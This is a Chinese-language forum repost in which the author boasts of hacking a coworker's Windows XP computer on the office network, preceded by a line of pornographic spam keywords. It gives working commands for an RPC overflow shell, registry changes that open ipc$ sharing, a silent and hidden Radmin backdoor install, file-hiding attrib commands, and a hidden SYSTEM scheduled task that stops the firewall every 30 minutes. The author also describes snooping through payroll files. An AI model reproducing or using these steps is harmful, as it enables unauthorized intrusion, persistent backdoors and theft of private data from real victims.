小男孩‘自慰网亚洲一区二区,亚洲一级在线播放毛片,亚洲中文字幕av每天更新,黄aⅴ永久免费无码,91成人午夜在线精品,色网站免费在线观看,亚洲欧洲wwwww在线观看

分享

入侵,轉(zhuǎn)自綏中網(wǎng)

 昵稱9698701 2012-04-10
我先打開命令提示符,用 ping 命令去ping 它,Reply from 192.168.16.4: bytes=32 time<1ms TTL=128,說明對(duì)方?jīng)]有防火墻,這樣或許有可能入侵。下一步,我使用了X-SCAN 3.2對(duì)它進(jìn)行了詳細(xì)掃描,對(duì)方電腦的操作系統(tǒng)是XP,大家知道XP系統(tǒng)是相當(dāng)安全的,在一些黑客論壇討論的關(guān)于入侵XP的話題也是比較多的,入侵這樣的系統(tǒng)方法只有兩種,一是采用釣魚的方法,這是一種被動(dòng)的方式讓對(duì)方中木馬來控制它。第二種方法就是如果對(duì)方有比較嚴(yán)重的漏洞,如RPC溢出。這樣的話,用溢出程序溢出它,然后再上傳控制程序進(jìn)行控制。掃描結(jié)果確實(shí)讓我高興了一陣,對(duì)方電腦有大量的漏洞,其中一個(gè)比較有名的就是沖擊波利用的RPC漏洞,這個(gè)漏洞相當(dāng)出名了,03年的時(shí)候曾席卷全球。知道了它有這個(gè)漏洞,下一步就要找溢出程序,這讓我忙活了好一陣時(shí)間,因?yàn)橛械囊绯龀绦驅(qū)@臺(tái)電腦好像無效。這些工具的名稱我都記不起來了,反正有好幾個(gè)。最后找到了一個(gè)溢出程序XP.EXE,這個(gè)程序終于溢出了那臺(tái)電腦。得到了個(gè)CMDSHELL。這算是一個(gè)小小的勝利吧。
得到了CMDSHELL,我該怎樣給它上傳控制程序呢?我想了一會(huì)兒,終于靈感來了,我和它在一個(gè)局域網(wǎng),用共享上傳最方便了。于是打開網(wǎng)上鄰居,查看工作組計(jì)算機(jī),找到這臺(tái)電腦,雙擊,進(jìn)不去,提示信息我記不清了,據(jù)我分析可能是對(duì)方這臺(tái)電腦沒有運(yùn)行網(wǎng)絡(luò)安裝向?qū)?,因?yàn)槭荴P系統(tǒng),所以要用共享傳輸文件,必須要運(yùn)行這個(gè)向?qū)Р豢?,運(yùn)行這個(gè)向?qū)ё饔镁褪桥渲靡粋€(gè)本地安全策略,你可以打開“控制面板—管理工具—本地安全策略”,展開“本地策略”—“用戶權(quán)利指派”。在右邊有一個(gè)安全策略—“拒絕從網(wǎng)絡(luò)訪問這臺(tái)計(jì)算機(jī)”。我想對(duì)方的電腦中相應(yīng)的這條策略里,肯定設(shè)置有GUEST這個(gè)用戶的,這就是為什么我打不開它的共享的原因,因?yàn)楣蚕碓L問默認(rèn)是以這個(gè)GEUST用戶登錄的,因?yàn)樗陌踩O(shè)置不允許GUEST從網(wǎng)絡(luò)訪問,所以我才訪問不了它的共享。因?yàn)閄P 默認(rèn)的共享模式是簡(jiǎn)單文件共享。這與WIN2000系統(tǒng)不同,如果是WIN2000系統(tǒng),你在知道管理員密碼的情況下,可以用命令net use IPipc$ "密碼" /user:用戶名 建立與對(duì)方的ipc$連接,隨之而來的就是copy 木馬程序 ipd$這樣的命令上傳木馬了。XP就不能這樣子了,你即使知道它的管理員密碼用上面的命令與不能建立ipc$連接。這就是為什么XP比2000系統(tǒng)安全的地方所在。下面我要作的就是要修改XP的共享模式為2000的共享模式。方法如下:在溢出獲得的CMDSHELL下,鍵入命令:
echo Windows Registry Editor Version 5.00 >c:123.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa] >>c:123.reg
echo. >>c:123.reg
echo "forceguest"=dword:00000000 >>c:123.reg
regedit /e c:123.reg
等打完這幾條命令后,對(duì)方XP的共享模式就已經(jīng)與2000的相同了。我來解釋一下這幾條命令的含意,echo Windows Registry Editor Version 5.00 >c:123.reg這條命令是將Windows Registry Editor Version 5.00這幾個(gè)字符保存到c:123.reg文件里。大家需要注意一下第一句的> 和后面幾句的>>這是有區(qū)別的,>字符是覆蓋式的,>>是追加式的,第三句的echo. >>c:123.reg命令是追加一個(gè)空白行,這句挺重要,如果不加這句是不能成功的,你可以隨便打開一個(gè)注冊(cè)表文件看一下,格式就是這樣的,第二行是空著的。這一點(diǎn)一定要注意。執(zhí)行完前四條命令后就在對(duì)方C盤下生成一個(gè)123.reg文件,內(nèi)容如下:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]
"forceguest"=dword:00000000
第五條命令是將這個(gè)REG文件導(dǎo)入到注冊(cè)表中。這樣執(zhí)行完這五條命令后,我就可以像操作2000系統(tǒng)一樣去用ipc$控制了。下一步,上傳控制程序。我選擇的是RADMIN2.0的服務(wù)程序,有人問這個(gè)安裝需要到圖形界面下,我說不用這么費(fèi)事,在CMDSHELL下一樣可以安裝。安裝前我們需要先準(zhǔn)備一下,首先生成一個(gè)REG文件,文件名:aaa.reg 內(nèi)容如下:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters]
"DisableTrayIcon"=hex:01,00,00,00

作用就是使生成的服務(wù)端程序能夠隱藏通知欄里的圖標(biāo),我們都知道正常安裝RADMIN服務(wù)端程序后,在通知欄里是有一個(gè)小圖標(biāo)的,我們要入侵人家,當(dāng)然要把這個(gè)小圖標(biāo)去掉,不然是會(huì)被發(fā)現(xiàn)的。接著生成一個(gè)BAT文件,我命名為aaa.bat,內(nèi)容如下:

r_server /install /silence
r_server.exe /port:2233 /pass:1 /save /silence
regedit.exe /s aaa.reg
net start r_server

這些命令是安裝命令,設(shè)置連接端口為:2233 密碼是:1 隱藏安裝界面的方式安裝 然后就是將aaa.reg導(dǎo)入注冊(cè)表,啟動(dòng)r_server服務(wù)。

準(zhǔn)備工作作好后,就要上傳文件了,一共需上傳4個(gè)文件,aaa.reg aaa.bat r_server.exe admdll.dll 后兩個(gè)文件是RADMIN安裝目錄下的,在安裝了RADMIN2.0客戶端后,安裝目錄里就有這兩個(gè)文件。我先建立ipc$連接 net use 192.168.16.4ipc$ "" /user:administrator 提示:命令成功完成。接著:
copy r_server 192.168.1.4admin$system32
copy aaa.bat 192.168.1.4admin$system32
copy aaa.reg 192.168.1.4admin$system32
copy admdll.dll 192.168.1.4admin$system32
然后再進(jìn)入溢出得到的CMDSHELL下鍵入:
attrib +s +h +r c:windowssystem32r_server.exe
attrib +s +h +r c:windowssystem32admdll.exe
attrib +s +h +r c:windowssystem32aaa.bat
attrib +s +h +r c:windowssystem32aaa.reg
這些命令是將這4個(gè)文件設(shè)置成系統(tǒng)隱藏只讀文件,不容易被對(duì)方管理員發(fā)現(xiàn)。
下一步就是運(yùn)行aaa.bat了,就這么簡(jiǎn)單,運(yùn)行成功后,我用radmin2.0客戶端設(shè)置了一下連接參數(shù),端口改成2233,連接成功,密碼是1,成功地看到了對(duì)方的屏幕。呵呵,成功了,從有入侵的想法到入侵成功進(jìn)行控制,只用了短短的4天時(shí)間。

進(jìn)入后看到對(duì)方電腦上正在玩QQ?;视螒颍贿^我也犯了個(gè)錯(cuò)誤我給它新建了個(gè)管理用戶,原先是打算用于ipc$連接用的,可我上傳RADMIN控制后忘記刪掉了,我在溢出的CMDSHELL 下不小心鍵入了命令EXIT,結(jié)果對(duì)方電腦出現(xiàn)了倒計(jì)時(shí)關(guān)機(jī)的界面,我也沒有及時(shí)處理掉,我當(dāng)時(shí)要是用RADMIN的CMD功能,鍵入命令 shutdown -A就可以取消這個(gè)倒計(jì)時(shí)關(guān)機(jī)的界面,可當(dāng)時(shí)我也沒有及時(shí)處理,導(dǎo)致對(duì)方電腦重啟了,重啟后我估計(jì)對(duì)方管理員看到了我新建的用戶了,后來我用RADMIN 遠(yuǎn)程查看時(shí),也覺得這個(gè)新建用戶太招搖了,用戶名就是ip$ ,圖標(biāo)是個(gè)大紅的花朵。
下午的時(shí)候我發(fā)現(xiàn)那臺(tái)電腦的管理員請(qǐng)了位高手來助陣了,因?yàn)槲覀冞@個(gè)局域網(wǎng)中的各臺(tái)電腦都通過我們辦公室里的那臺(tái)電腦連接到互聯(lián)網(wǎng)上,所以,那位高手先到我們辦公室電腦上查看了一番沒有發(fā)現(xiàn)問題后,他將原先安裝的江民換成了卡巴了,我估計(jì)他認(rèn)為攻擊是來自互聯(lián)網(wǎng)上,豈不知黑客就在他眼皮底下,嘿嘿。。。。那位高手又給被我控制了的電腦上安裝了卡巴,原先的殺毒軟件是諾頓,對(duì)WINDOWS也進(jìn)行了更新,可這些作法都晚了,因?yàn)槲乙呀?jīng)控制你了,再打補(bǔ)丁也無用了。經(jīng)過那位高手一番檢查與修補(bǔ)后,我的后門依然存在著,看來那位高手水平也不怎么樣。我給它開放的ipc$功能,他也沒發(fā)現(xiàn)。也許他只認(rèn)為是一次簡(jiǎn)單的病毒攻擊,而掉以輕心了,而不知他的一舉一動(dòng)都在我的監(jiān)視之下。哈哈。。。
接下來的工作對(duì)我來說就比較簡(jiǎn)單了,給它開telnet服務(wù)器,開“遠(yuǎn)程桌面”這個(gè)我采用的是圖形的方式進(jìn)行操作的,中午下班后我等這臺(tái)計(jì)算機(jī)管理員走后,用RADMIN登錄進(jìn)去進(jìn)行了一些設(shè)置工作。后來也通過RADMIN的文件管理功能翻看了這臺(tái)電腦上的文件,有一些財(cái)務(wù)報(bào)表,工資表之類的東西,這些對(duì)我來看沒什么大的吸引力。不過我看到了我們集團(tuán)老總的工資,每月一萬多塊錢呢??!好黑啊。。。這么多,我工資只有區(qū)區(qū)幾百塊,真是太不公平了,憤憤不平中。。。。
后來一次通過RADMIN操作對(duì)方的電腦時(shí)不小心被管理員發(fā)現(xiàn)了,我想對(duì)方的管理員也很感到意外, windows的補(bǔ)丁打上了,還裝了強(qiáng)悍的卡巴,還是搞不定黑客??!哈哈,因?yàn)榭ò筒皇菤ADMIN的。后來對(duì)方那個(gè)管理員啟用了局域網(wǎng)“本地連接”中的防火墻功能,這樣我無法連接它的電腦了。因?yàn)镽ADMIN是正向連接的,所以在對(duì)方開防火墻的情況下是無法使用的。有一次下午下班后我無意地ping 了一下這臺(tái)電腦的IP,居然有返回。說明對(duì)方防火墻關(guān)閉了,我馬上用RADMIN連接,居然成功。我暈。。。原來對(duì)方只開了防火墻,并沒有發(fā)現(xiàn)這個(gè)明顯的后門。我想開防火墻也是那位電腦高手給搞的,依那個(gè)管理員的水平是想不到這個(gè)辦法的。不過telnet服務(wù)器給關(guān)閉了,3389遠(yuǎn)程桌面也給關(guān)了,共享模式也被修改回了原先的樣子??磥砟俏桓呤忠彩前l(fā)現(xiàn)了一些漏洞并補(bǔ)上了,但是那個(gè)后門,他卻沒有發(fā)現(xiàn),這就給我創(chuàng)造了第二次入侵的機(jī)會(huì)。他有政策我有對(duì)策,他可以開防火墻,我可以給他關(guān)掉,有人問要是再被管理員開啟了防火墻,那豈不是沒得玩了。哈哈。。。我下面給出一個(gè)我自己研究出來的獨(dú)門密方,保證百?。」?。。。。
我的方法是創(chuàng)建一個(gè)隱藏的計(jì)劃任務(wù)。讓這個(gè)計(jì)劃任務(wù)每隔半個(gè)小時(shí)殺除一遍防火墻,這樣即使對(duì)方管理員打開防火墻也起不了什么作用。方法如下:先建一個(gè)批處理文件abc.bat,放在c:windowssystem32目錄下,內(nèi)容如下:
net stop sharedaccess
當(dāng)然也可以附加點(diǎn)別的,比如說你想半小時(shí)殺除一遍天網(wǎng)防火墻,可以再加上下面的命令:

taskkill /IM rfw.exe /f
如果想使共享模式是高級(jí)共享模式,可以再加上下面的命令:

regedit /e c:windowssystem32abc.reg
當(dāng)然這需要事先上傳一個(gè)abc.reg到它的c:windowssystem32目錄下,內(nèi)容如下:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]
"forceguest"=dword:00000000
下面我說一下創(chuàng)建隱藏計(jì)劃任務(wù)的方法:
在對(duì)方電腦的CMDSHELL下鍵入命令:
schtasks /create /tn "常駐" /tr c:windowssystem32abc.bat /sc minute /mo 30 /ru "system"
這樣就在對(duì)方電腦上建立了一個(gè)以SYSTEM權(quán)限運(yùn)行的計(jì)劃任務(wù),這個(gè)計(jì)劃任務(wù)每隔30分鐘運(yùn)行一次c: windowssystem32abc.bat,功能嘛,就是根據(jù)abc.bat里面的命令行決定了,可以說這個(gè)新發(fā)現(xiàn)是相當(dāng)厲害的,利用的巧妙,功能可以相當(dāng)強(qiáng)大。如果只有這樣還不能達(dá)到隱藏的要求,你打開控制面板—任務(wù)計(jì)劃,仍然可以發(fā)現(xiàn)它的存在。好的,下面說說隱藏它的方法。還是進(jìn)入 CMDSHELL中。鍵入命令attrib +h c:windowstasks常駐.job回車后,你再到控制面板的任務(wù)計(jì)劃中看一下是不是以前的任務(wù)消失了。這只是表面消失,實(shí)際是它還是存在的。你可以在CMDSHELL下鍵入命令:schtasks查看。這樣不管對(duì)方管理員怎樣修改設(shè)置,每隔半小時(shí)就又會(huì)補(bǔ)修改回來。它想擺脫我的控制可說是難上加難了。哈哈。。

    本站是提供個(gè)人知識(shí)管理的網(wǎng)絡(luò)存儲(chǔ)空間,所有內(nèi)容均由用戶發(fā)布,不代表本站觀點(diǎn)。請(qǐng)注意甄別內(nèi)容中的聯(lián)系方式、誘導(dǎo)購(gòu)買等信息,謹(jǐn)防詐騙。如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請(qǐng)點(diǎn)擊一鍵舉報(bào)。
    轉(zhuǎn)藏 分享 獻(xiàn)花(0

    0條評(píng)論

    發(fā)表

    請(qǐng)遵守用戶 評(píng)論公約

    類似文章 更多